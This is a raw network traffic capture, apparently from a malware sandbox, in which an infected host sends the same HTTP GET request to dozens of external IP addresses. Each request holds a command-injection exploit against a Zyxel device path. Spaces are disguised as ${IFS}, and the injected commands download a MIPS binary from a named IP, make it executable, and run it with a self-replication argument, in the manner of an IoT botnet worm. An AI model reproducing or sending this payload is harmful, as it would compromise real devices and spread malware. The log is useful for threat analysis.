                                              Jan 29, 2024 07:03:35.728192091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              900192.168.2.144645237.81.219.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728239059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              901192.168.2.1440302182.61.213.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728291988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              902192.168.2.146088625.242.238.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728322983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              903192.168.2.144951694.217.10.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728341103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              904192.168.2.1449602123.72.54.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728391886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              905192.168.2.14504209.99.116.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728442907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              906192.168.2.1459964139.57.86.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728485107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              907192.168.2.1445350144.10.198.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728507996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              908192.168.2.145890898.204.92.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728558064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              909192.168.2.145249427.241.9.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728584051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              910192.168.2.143526072.26.96.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728631020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              911192.168.2.1449514221.15.98.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728666067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              912192.168.2.1452322106.200.74.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728715897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              913192.168.2.1433104204.174.108.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728743076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              914192.168.2.145630267.167.183.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728789091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              915192.168.2.1440228128.21.23.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728821039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              916192.168.2.1441854178.198.19.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728846073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              917192.168.2.143787265.230.31.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728878975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              918192.168.2.1438122204.158.222.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728933096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              919192.168.2.1449034154.171.190.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728967905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              920192.168.2.1441384210.224.249.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729001045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              921192.168.2.1449178144.143.109.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729017019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              922192.168.2.14468662.2.32.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729065895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              923192.168.2.1435758158.217.113.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729116917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              924192.168.2.146058850.120.55.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729142904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              925192.168.2.1459128151.96.16.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729176044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              926192.168.2.1435148222.24.66.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729223013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              927192.168.2.1459860222.10.163.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729249001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              928192.168.2.1443492185.244.31.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729281902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              929192.168.2.1451234199.150.104.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729326963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              930192.168.2.1446458122.97.203.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729367971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              931192.168.2.1460512142.78.54.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729425907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              932192.168.2.1435170129.51.36.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729445934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              933192.168.2.1441662206.78.133.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729470968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              934192.168.2.1442658173.124.139.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729521036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              935192.168.2.144623068.72.42.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729574919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              936192.168.2.1455964102.78.71.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729604006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              937192.168.2.143859069.174.237.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729635000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              938192.168.2.145073495.208.89.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729662895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              939192.168.2.1456228103.117.155.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729684114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              940192.168.2.1435072208.187.152.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729722977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              941192.168.2.1457756181.158.94.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729792118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              942192.168.2.1443104154.173.83.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729809999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              943192.168.2.1434020142.50.209.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729840040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              944192.168.2.1442072202.236.5.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729882956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              945192.168.2.1460366155.23.180.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729909897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              946192.168.2.1441640117.189.200.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729934931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              947192.168.2.145888040.202.97.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729965925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              948192.168.2.144774869.90.115.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.729993105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              949192.168.2.1443666109.216.40.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730019093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              950192.168.2.1445572153.21.241.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730060101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              951192.168.2.1440714108.202.116.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730115891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              952192.168.2.1439918190.168.195.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730138063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              953192.168.2.1435964181.173.169.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730185032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              954192.168.2.144857866.142.203.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730216980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              955192.168.2.1454716196.68.60.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730242968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              956192.168.2.1443114108.250.75.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730283022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              957192.168.2.145484042.24.162.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730326891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              958192.168.2.1433372122.6.9.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730344057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              959192.168.2.143921218.45.44.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730381966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              960192.168.2.1459844186.37.214.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730413914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              961192.168.2.143651023.200.46.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730460882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              962192.168.2.1447042124.5.11.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730516911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              963192.168.2.1444370125.28.207.212443
                                              TimestampBytes transferredDirectionData
